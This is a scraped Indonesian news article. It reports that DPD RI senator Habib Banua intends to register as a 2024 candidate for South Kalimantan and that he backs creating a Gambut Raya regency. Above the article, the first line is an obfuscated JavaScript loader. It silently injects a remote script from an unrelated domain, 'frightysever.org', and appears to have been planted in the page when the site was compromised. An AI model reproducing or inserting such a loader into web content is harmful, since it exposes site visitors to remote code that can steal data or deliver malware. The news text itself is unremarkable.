(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Selatan

Habib Banua Kembali Incar Kursi Senator DPD RI


KANALKALIMANTAN.COM, BANJARMASIN – Pendaftaran bakal calon anggota Dewan Perwakilan Daerah (DPD) RI periode 2024-2028 dibuka KPU Kalimantan Selatan 1 Mei 2023.

Salah satu tokoh yang mantap akan mendaftarkan diri sebagai bakal calon anggota DPD RI Dapil Kalsel yaitu Pangeran Syarif Abdurrahman Bahasyim atau dikenal Habib Banua.

Lelaki yang saat ini masih aktif sebagai Anggota DPD RI yakin dapat kembali terpilih sebagai satu dari empat orang yang akan duduk sebagai Anggota DPD RI Dapil Kalsel 2024-2028.

Sejumlah persyaratan administrasi untuk mendaftar pun sudah disiapkannya. Termasuk dirinya telah dinyatakan lolos verifikasi administrasi dan faktual syarat minimal dukungan 2 ribu KTP untuk bakal calon anggota DPD RI.

Baca juga: Mantan Napi Bisa Daftar Bacaleg, KPU Kalsel Sebut Syarat yang Mesti Dipenuhi

“Persyaratan sudah lengkap. Insyaallah pada tanggal 1 Mei, kalau tidak berhalangan saya akan mendaftar ke KPU Kalsel,” katanya kepada kanalkalimantan.com,  Jumat (28/4/2023) sore.

Sejumlah gagasan pun telah disiapkannya. Salah satunya Habib Banua mengangkat isu pemekaran wilayah Gambut Raya yang saat ini masih termasuk wilayah Kabupaten Banjar.

Menurutnya, di Komisi I DPD RI bidang Politik, hukum, dan pemerintah beberapa waktu lalu dirinya bersama sejumlah pihak telah mengusulkan Gambut Raya untuk dijadikan kabupaten di Kalimantan Selatan.

“Itu nanti yang akan saya perjuangkan jika masih di Komisi I,” ucapnya.

Menurutnya, proses pemekaran wilayah Gambut Raya telah sampai kepada pemenuhan persyaratan oleh panitia pemekaran. Sehingga dia optimis dapat merealisasikan pemekaran tersebut dalam waktu dekat.

“Tinggal panitia yang ada di Gambut Raya menyiapkan dan melengkapi persyaratan-persyaratanya,” kata Habib Banua.

Baca juga: KPU Banjarmasin Buka Pendaftaran Bacaleg Mulai 1 Mei

“Sehingga ketika moratorium pemekaran daerah otonomi baru (DOB) itu dicabut oleh pemerintah pusat, DPD akan langsung running,” tambahnya.

Diketahui, selain Habib Banua ada 9 nama lain  yang juga dinyatakan lolos verifikasi administrasi dan faktual syarat dukungan minimal 2 ribu KTP untuk pencalonan DPD RI Dapil Kalsel.

Mereka antara lain, Antung Fatmawati, Habib Hamid Abdullah, Gusti Farid Hasan Aman, Habib Zakaria Bahasyim, Mohammad Sofwat Hadi, Muhammad Hidayatullah, Muhammad Yamin, Nanik Hayati, dan Sayid Umar Al Idrus. (Kanalkalimantan.com/rizki)

Reporter: rizki
Editor: bie


Al Ghifari

Recent Posts

Pastikan Listrik Tanpa Kedip KTT WWF 2024 Bali

KANALKALIMANTAN.COM, DENPASAR - PT PLN (Persero) siap menghadirkan listrik yang andal untuk mendukung penyelenggaraan Konferensi… Read More

4 menit ago

Santri TK Al Quran di Kabupaten Banjar Ikuti Munaqasah

KANALKALIMANTAN.COM, MARTAPURA -  Santri TK Al Quran se-Kabupaten Banjar mengikuti Munaqasah yang digelar Badan Komunikasi… Read More

24 menit ago

Jelang Pilwali Banjarbaru, Nurkhalis: Masih Lihat Peta Peluang Koalisi

KANALKALIMANTAN.COM, BANJARBARU - Peta koalisi partai politik jelang Pilkada 2024 di Kota Banjarbaru Kalimantan Selatan… Read More

2 jam ago

Daftar Bareng Aditya-Yuti, Koalisi “AYUHA” PPP-Gerindra di Pilwali Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Teka-teki maju atau tidaknya Aditya Mufti Ariffin mulai terjawab, bahkan siapa calon… Read More

3 jam ago

Manis Cuan Pokmas Madu Kelulut Berkat Bersatu dari Program RT Mandiri

KANALKALIMANTAN.COM, BANJARBARU – Berawal dari temuan sarang kelulut di dalam pondasi rumah tinggal warga, muncul… Read More

5 jam ago

Nasdem-PKS Koalisi di Pilwali Banjarbaru, Darmawan Jaya Siap Tantang Petahana

KANALKALIMANTAN.COM, BANJARBARU - Nama Darmawan Jaya Setiawan menjadi orang pertama yang menyerahkan formulir pendaftaran penjaringan… Read More

6 jam ago

This website uses cookies.